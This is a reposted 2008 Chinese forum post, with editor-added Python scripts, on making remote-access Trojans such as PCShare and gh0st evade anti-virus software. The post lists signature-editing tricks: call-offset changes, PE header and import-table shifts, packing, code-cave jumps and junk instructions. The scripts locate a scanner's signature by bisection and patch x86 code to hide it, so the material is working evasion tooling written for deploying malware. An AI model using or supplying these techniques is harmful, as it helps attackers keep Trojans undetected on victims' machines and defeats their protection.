Sharing experience with Trojan anti-virus evasion (免杀) techniques - vulnerability warning - Heiba Security Net (黑吧安全网)

2008-05-24T00:00:00
ID MYHACK58:62200819136
Type myhack58
Reporter 佚名 (anonymous)
Modified 2008-05-24T00:00:00

Description

Trojan anti-virus evasion (免杀, "free kill") in China dates from roughly 2005. Since then single signatures have become composite signatures, and anti-virus software has moved on to active defense, so evasion keeps getting harder. But the core of it has not changed: change the signature. Some auxiliary tools now also do behavior-based detection.

The explanations below use remote-control software (remote administration Trojans) as the example. (One concept to add here: reverse-connection, or "bounce", Trojans, where the server end actively connects to the client. Active connection means you only have to start the client program on your own machine; the Trojan on the compromised machine then connects to that program by itself, so you do not have to look up its IP and connect to it, which saves a lot of trouble.)

Because active defense is now so strong, especially Kaspersky's, while Rising's active defense is signature-based and therefore easy to get past, choose remote-control software that itself already passes active defense, such as PCSHARE, iRaT+Classic, gh0st and so on. I personally think these are good and are easy to make evasive.

Behavior-based detection: most Trojans have a default drop path, and after installation contain a few specific strings. For example, Gray Pigeon (灰鸽子) carries the string "Gray Pigeon installation" after installation, and the Hacker Defense (黑防) Pigeon carries "Hacker Defense special edition" and similar strings; these are what behavior-based detection uses as features of the Trojan. Remove the path when configuring, and after configuring, open the file in C32ASM and Find/Replace the strings inside.

The most critical part, I think, is the signature; most people probably think it is active defense. From my experience with these Trojans, PCShare, iRaT+Classic and the like pass active defense as soon as the signature is changed, because the software itself already gets through the main anti-virus products' active defense. Here is my experience with changing signatures:

1. After locating the signature, do not hurry to change it; first look at the bytes before and after it. When I located PCSHARE's signature I found "system.sys", and the dot was what got detected, that is, the signature. I changed the "system" before the dot to upper case, and after that it passed anti-virus. In other words, do not simply change whatever byte the locator points at.

2. If the locator lands on a call, try this: for example, if it lands on call 12345678, try changing it to call 12345677, that is, subtract 1. This method is very useful.

3. If it lands in the PE header, shift the PE header. I will not explain it in detail; look the method up online, it is very simple, just a small calculation and a shift. A second method, which I have heard from friends in the group but have not tried myself, is to pack the file with a packer and then unpack it; that can also make it evade.

4. If it lands in the import table, likewise shift it; there are many write-ups of this online too. Since it is already well covered I will not describe it in detail, only hint at it; while searching for evasion methods you will learn a lot.

5. The plus-one / minus-one method: if the locator lands on a number or some other symbol, try adding or subtracting one. I have tried this too, and it is sometimes quite useful.

6. Pack first, then locate the signature; this can reduce the number of signature modifications needed.

7. The jump method: find a zero-filled area, or better, insert one yourself, and move the code there. This is a commonly used method.

8. Against Kaspersky, junk instructions (花指令) are very effective. How to write them: a junk sequence is a pile of meaningless instructions that accomplish nothing; the only thing you must do is keep the stack balanced, otherwise the program errors out.

9. To learn evasion you should understand some hex editing tools and assembly tools, and know some assembly; then the modifications go much more smoothly. I recommend everyone visit www.pediy.com (a big, well-known site, the Pediy / 看雪 forum), and also 甲壳虫 (Beetle) at www.jksing.com/bbs, which has a lot of evasion material and from time to time publishes evasion-ready DAT files.
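Item 1 above starts from a signature that has already been located but does not show how that is done. The Python script below is an added example by the editor, not code from the original post: it demonstrates the fill-and-scan approach the locating tools use, overwrite a region with zeros, hand the result to the scanner, and see whether it still fires. The scanner here is a constructed stand-in that keys on the string `system.sys` from the PCSHARE example; a real run hands every variant to the actual AV engine, which is slow, and that is why the bisection below matters. The sample "binary", its offsets and all function names are assumptions for the example.

```python
# Added example (not from the original post): locating a scanner's signature
# by zero-filling regions of the file and re-scanning.
import random

SIGNATURE = b"system.sys"      # constructed: stands in for the real pattern

def constructed_scanner(data):
    """Stand-in for an AV engine; a real run hands the file to the scanner."""
    return SIGNATURE in data

def zero_range(data, start, end):
    """Copy of data with [start, end) overwritten by zeros."""
    return data[:start] + bytes(end - start) + data[end:]

def locate_signature(data, detected):
    """Return the [start, end) range of bytes the scanner keys on, or None if
    the untouched file is not detected at all.

    Two binary searches, each O(log n) scans instead of one scan per chunk:
    the smallest e such that zeroing [0, e) defeats detection puts the first
    signature byte at e-1; the largest s such that zeroing [s, n) defeats
    detection puts the last signature byte at s.  For a composite
    (AND-combined) signature the range spans all parts: patch inside it and
    run again on the patched file to find what remains.
    """
    n = len(data)
    if not detected(data):
        return None
    if detected(zero_range(data, 0, n)):
        raise ValueError("zero-filled file is still detected; not a byte signature")
    lo, hi = 0, n          # zeroing [0, lo) keeps detection, zeroing [0, hi) kills it
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if detected(zero_range(data, 0, mid)):
            lo = mid
        else:
            hi = mid
    first = hi - 1
    lo, hi = 0, n          # zeroing [lo, n) kills detection, zeroing [hi, n) keeps it
    while hi - lo > 1:
        mid = (lo + hi) // 2
        if detected(zero_range(data, mid, n)):
            hi = mid
        else:
            lo = mid
    return first, lo + 1

def build_sample_file(offset=300, size=1024):
    """Constructed 'binary': deterministic non-zero filler with SIGNATURE planted."""
    rng = random.Random(7)
    filler = bytes(rng.randrange(1, 256) for _ in range(size))
    return filler[:offset] + SIGNATURE + filler[offset + len(SIGNATURE):]

if __name__ == "__main__":
    sample = build_sample_file()
    print(locate_signature(sample, constructed_scanner))   # (300, 310)
    print(sample[300:310])
```

Once the range is known, the post's advice applies: look at the bytes around it and change something nearby rather than blindly overwriting the located bytes.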
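Items 2, 7 and 8 (call minus one, the jump to a zero area, and stack-balanced junk instructions) as an added Python example, not from the original post. It works on a constructed 32-bit code image, not a real Trojan, with a 15-byte window of `mov` instructions standing in for the located signature. `retarget_call` applies the minus-one trick and refuses unless every byte between the new and old target is nop padding, which is the usual case in front of an aligned function; otherwise the call lands on a partial instruction and the program crashes. `junk_block` assembles junk from register- and flag-preserving instructions and rejects any sequence that does not push and pop in matching order, the stack-balance rule from item 8. `move_to_cave` relocates the window into the cave behind the junk and jumps back, and `trace` follows the jumps to confirm the same instructions still execute. All names, opcodes chosen and offsets are assumptions for the example.

```python
# Added example (not from the original post): "call minus one", code-cave jump
# and junk instructions on a constructed x86-32 code image, with checks.
import struct

NOP, CALL, JMP = 0x90, 0xE8, 0xE9
SIGNATURE_WINDOW = 15      # assumed: the locator flagged code[0:15]
MOVS = (b"\xB8\x01\x00\x00\x00"    # 0x00 mov eax, 1   } the flagged window;
        b"\xBB\x02\x00\x00\x00"    # 0x05 mov ebx, 2   } position independent,
        b"\xB9\x03\x00\x00\x00")   # 0x0A mov ecx, 3   } so it may be moved

def rel32(at, target):
    """rel32 displacement for a 5-byte E8/E9 at offset `at` reaching `target`."""
    return struct.pack("<i", target - (at + 5))

def jump_target(code, at):
    """Target of the 5-byte call/jmp at `at`."""
    if code[at] not in (CALL, JMP):
        raise ValueError("not an E8/E9 instruction")
    return at + 5 + struct.unpack_from("<i", code, at + 1)[0]

def retarget_call(code, at, delta):
    """'call minus one': shift the target so the instruction bytes change.  Safe
    only if every byte between old and new target is a one-byte nop, so that
    execution falls through into the real function; refuse otherwise."""
    old = jump_target(code, at)
    new = old + delta
    lo, hi = sorted((old, new))
    if lo < 0 or any(b != NOP for b in code[lo:hi]):
        raise ValueError("new target is not on nop padding next to the function")
    return code[:at + 1] + rel32(at, new) + code[at + 5:]

# Junk instruction set: one-byte ops that preserve registers and flags when
# paired.  Value: (encoding, push/pop/None, what is pushed or popped)
JUNK = {"push eax": (b"\x50", "push", "eax"), "pop eax": (b"\x58", "pop", "eax"),
        "pushfd": (b"\x9C", "push", "eflags"), "popfd": (b"\x9D", "pop", "eflags"),
        "nop": (b"\x90", None, None)}

def junk_block(names):
    """Assemble junk, rejecting a pop that does not match the top of the stack
    or a sequence that leaves the stack unbalanced (the error item 8 warns of)."""
    stack, out = [], bytearray()
    for name in names:
        enc, op, what = JUNK[name]
        if op == "push":
            stack.append(what)
        elif op == "pop":
            if not stack or stack[-1] != what:
                raise ValueError(f"{name} does not match the top of the stack")
            stack.pop()
        out += enc
    if stack:
        raise ValueError(f"junk leaves {stack} on the stack")
    return bytes(out)

def move_to_cave(code, start, length, cave, junk):
    """Jump method: jmp from the flagged window to a zero-filled cave holding
    junk + the moved bytes, then jmp back.  The window must hold whole,
    position-independent instructions and be at least 5 bytes for the jmp."""
    body = junk + code[start:start + length]
    end = cave + len(body) + 5
    if length < 5 or end > len(code) or any(code[cave:end]):
        raise ValueError("window too small, or cave not empty / too small")
    buf = bytearray(code)
    buf[start:start + 5] = bytes([JMP]) + rel32(start, cave)
    buf[start + 5:start + length] = bytes([NOP]) * (length - 5)
    buf[cave:cave + len(body)] = body
    back = cave + len(body)
    buf[back:back + 5] = bytes([JMP]) + rel32(back, start + length)
    return bytes(buf)

def trace(code, at=0, limit=64):
    """Follow execution over the opcode subset used here (mov r32,imm32 and
    call are 5 bytes, call is stepped over; push/pop/pushfd/popfd/nop are one
    byte; jmp is followed; ret stops) and return the instruction bytes run."""
    seen = []
    while len(seen) < limit:
        op = code[at]
        if op == JMP:
            at = jump_target(code, at)
            continue
        size = 5 if (0xB8 <= op <= 0xBF or op == CALL) else 1
        seen.append(code[at:at + size])
        if op == 0xC3:                 # ret
            break
        at += size
    return seen

def build_sample():
    """Constructed image: window, call 0x40, ret, nop padding, callee (ret) at
    0x40, then a 64-byte zero cave starting at 0x41."""
    body = MOVS + bytes([CALL]) + rel32(0x0F, 0x40) + b"\xC3"
    body += bytes([NOP]) * (0x40 - len(body)) + b"\xC3"
    return body + bytes(64)

if __name__ == "__main__":
    original = build_sample()
    junk = junk_block(["push eax", "pushfd", "nop", "popfd", "pop eax"])
    patched = move_to_cave(original, 0, SIGNATURE_WINDOW, 0x41, junk)
    print([i.hex() for i in trace(patched)])
    print(hex(jump_target(retarget_call(original, 0x0F, -1), 0x0F)))
```

`trace` is the check worth keeping: after a cave patch, the executed instruction stream must equal the original stream with only the junk prepended; if it does not, the window cut an instruction in half or moved a relative branch, and the file will run differently or crash regardless of whether the scanner is silent.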